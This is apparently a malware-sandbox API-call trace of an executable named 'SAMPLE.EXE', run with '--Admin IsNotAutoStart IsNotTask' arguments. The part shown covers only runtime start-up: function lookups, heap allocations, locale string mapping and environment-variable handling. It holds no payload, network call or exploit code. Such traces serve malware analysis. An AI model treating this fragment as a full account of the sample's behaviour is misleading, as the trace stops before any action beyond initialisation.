[0070.199] GetProcAddress (hModule=0x76e10000, lpProcName="GetUserDefaultLocaleName") returned 0x76ea47c1 [0070.199] GetProcAddress (hModule=0x76e10000, lpProcName="IsValidLocaleName") returned 0x76ea47e1 [0070.200] GetProcAddress (hModule=0x76e10000, lpProcName="LCMapStringEx") returned 0x76ea47f1 [0070.200] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentPackageId") returned 0x0 [0070.200] GetProcAddress (hModule=0x76e10000, lpProcName="GetTickCount64") returned 0x76e3eee0 [0070.200] GetProcAddress (hModule=0x76e10000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0070.200] GetProcAddress (hModule=0x76e10000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0070.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x3bc) returned 0x69f100 [0070.201] GetCurrentThreadId () returned 0x770 [0070.207] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x690950 [0070.207] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x800) returned 0x69f4c8 [0070.207] GetStartupInfoW (in: lpStartupInfo=0x18f404 | out: lpStartupInfo=0x18f404*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x425128, hStdOutput=0x738d83ee, hStdError=0x58)) [0070.207] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0070.207] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0070.207] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0070.207] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe\" --Admin IsNotAutoStart IsNotTask" [0070.208] GetEnvironmentStringsW () returned 0x69fcd0* [0070.248] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xaca) returned 0x6a07a8 [0070.257] FreeEnvironmentStringsW (penv=0x69fcd0) returned 1 [0070.266] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x511130, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\%localappdata%24fd5b09-6d4d-435f-beb9-3d272f67be2csample.exe.exe")) returned 0x66 [0070.266] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x124) returned 0x69fcd0 [0070.266] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x98) returned 0x69fe00 [0070.266] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x3e) returned 0x695428 [0070.266] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x6c) returned 0x69fea0 [0070.266] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x6e) returned 0x69ff18 [0070.266] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x78) returned 0x692178 [0070.266] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x62) returned 0x69ff90 [0070.266] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x2e) returned 0x69ad68 [0070.266] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x48) returned 0x696928 [0070.266] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x28) returned 0x69a760 [0070.266] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x1a) returned 0x69ec60 [0070.266] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x4a) returned 0x6a0000 [0070.266] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x72) returned 0x6921f8 [0070.266] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x30) returned 0x69ada0 [0070.266] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x2e) returned 0x69add8 [0070.266] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x1c) returned 0x69ec88 [0070.266] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xd2) returned 0x6a0058 [0070.267] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x7c) returned 0x6a0138 [0070.267] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x36) returned 0x6a01c0 [0070.267] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x3a) returned 0x695470 [0070.267] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x90) returned 0x6a0200 [0070.267] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x24) returned 0x69a790 [0070.267] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x30) returned 0x69ae10 [0070.267] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x36) returned 0x6a0298 [0070.267] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x48) returned 0x696978 [0070.267] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x52) returned 0x6a02d8 [0070.267] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x3c) returned 0x6954b8 [0070.267] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x82) returned 0x6a0338 [0070.267] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x2e) returned 0x69ae48 [0070.267] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x1e) returned 0x69ecb0 [0070.267] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x2c) returned 0x69ae80 [0070.267] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x54) returned 0x6a03c8 [0070.267] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x52) returned 0x6a0428 [0070.267] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x2a) returned 0x69aeb8 [0070.267] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x3c) returned 0x695500 [0070.267] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x54) returned 0x6a0488 [0070.267] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x24) returned 0x69a7c0 [0070.267] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x30) returned 0x69aef0 [0070.267] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x8c) returned 0x6a04e8 [0070.267] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a07a8 | out: hHeap=0x680000) returned 1 [0070.351] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x800) returned 0x6a0580 [0070.360] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x80) returned 0x6a0d88 [0070.399] GetLastError () returned 0x0 [0070.399] SetLastError (dwErrCode=0x0) [0070.399] GetLastError () returned 0x0 [0070.399] SetLastError (dwErrCode=0x0) [0070.399] GetLastError () returned 0x0 [0070.399] SetLastError (dwErrCode=0x0) [0070.399] GetACP () returned 0x4e4 [0070.399] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x220) returned 0x6a0e10 [0070.399] GetLastError () returned 0x0 [0070.399] SetLastError (dwErrCode=0x0) [0070.399] IsValidCodePage (CodePage=0x4e4) returned 1 [0070.399] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f3f8 | out: lpCPInfo=0x18f3f8) returned 1 [0070.407] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18eec0 | out: lpCPInfo=0x18eec0) returned 1 [0070.416] GetLastError () returned 0x0 [0070.416] SetLastError (dwErrCode=0x0) [0070.416] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f2d4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0070.425] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f2d4, cbMultiByte=256, lpWideCharStr=0x18ec38, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0070.425] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18eed4 | out: lpCharType=0x18eed4) returned 1 [0070.425] GetLastError () returned 0x0 [0070.425] SetLastError (dwErrCode=0x0) [0070.425] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f2d4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0070.425] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f2d4, cbMultiByte=256, lpWideCharStr=0x18ec08, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0070.433] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0070.433] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e9f8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0070.433] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18f1d4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ^\x84\x8ds\x10ô\x18", lpUsedDefaultChar=0x0) returned 256 [0070.434] GetLastError () returned 0x0 [0070.434] SetLastError (dwErrCode=0x0) [0070.434] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f2d4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0070.434] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f2d4, cbMultiByte=256, lpWideCharStr=0x18ec28, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0070.434] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0070.434] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x18ea18, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0070.434] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18f0d4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ^\x84\x8ds\x10ô\x18", lpUsedDefaultChar=0x0) returned 256 [0070.462] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0070.462] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x431d5b) returned 0x0 [0070.507] RtlSizeHeap (HeapHandle=0x680000, Flags=0x0, MemoryPointer=0x6a0d88) returned 0x80 [0070.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0070.523] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x1f) returned 0x69ecd8 [0070.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x69ecd8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 31 [0070.531] GetLastError () returned 0x0 [0070.531] SetLastError (dwErrCode=0x0) [0070.531] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x6a1480 [0070.531] RtlSizeHeap (HeapHandle=0x680000, Flags=0x0, MemoryPointer=0x6a1480) returned 0x4 [0070.531] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6a1480, Size=0x8) returned 0x6a1480 [0070.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0070.531] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x36) returned 0x6a1490 [0070.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x6a1490, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpUsedDefaultChar=0x0) returned 54 [0070.531] GetLastError () returned 0x0 [0070.531] SetLastError (dwErrCode=0x0) [0070.532] GetLastError () returned 0x0 [0070.532] SetLastError (dwErrCode=0x0) [0070.532] GetLastError () returned 0x0 [0070.532] SetLastError (dwErrCode=0x0) [0070.540] RtlSizeHeap (HeapHandle=0x680000, Flags=0x0, MemoryPointer=0x6a1480) returned 0x8 [0070.540] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6a1480, Size=0xc) returned 0x6a14d0 [0070.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0070.540] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x37) returned 0x6a14e8 [0070.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x6a14e8, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 55 [0070.541] GetLastError () returned 0x0 [0070.541] SetLastError (dwErrCode=0x0) [0070.541] GetLastError () returned 0x0 [0070.541] SetLastError (dwErrCode=0x0) [0070.541] GetLastError () returned 0x0 [0070.541] SetLastError (dwErrCode=0x0) [0070.541] GetLastError () returned 0x0 [0070.541] SetLastError (dwErrCode=0x0) [0070.541] GetLastError () returned 0x0 [0070.541] SetLastError (dwErrCode=0x0) 